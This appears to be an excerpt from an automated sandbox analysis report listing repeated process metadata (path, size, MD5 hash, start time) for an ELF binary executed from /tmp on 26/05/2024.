                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e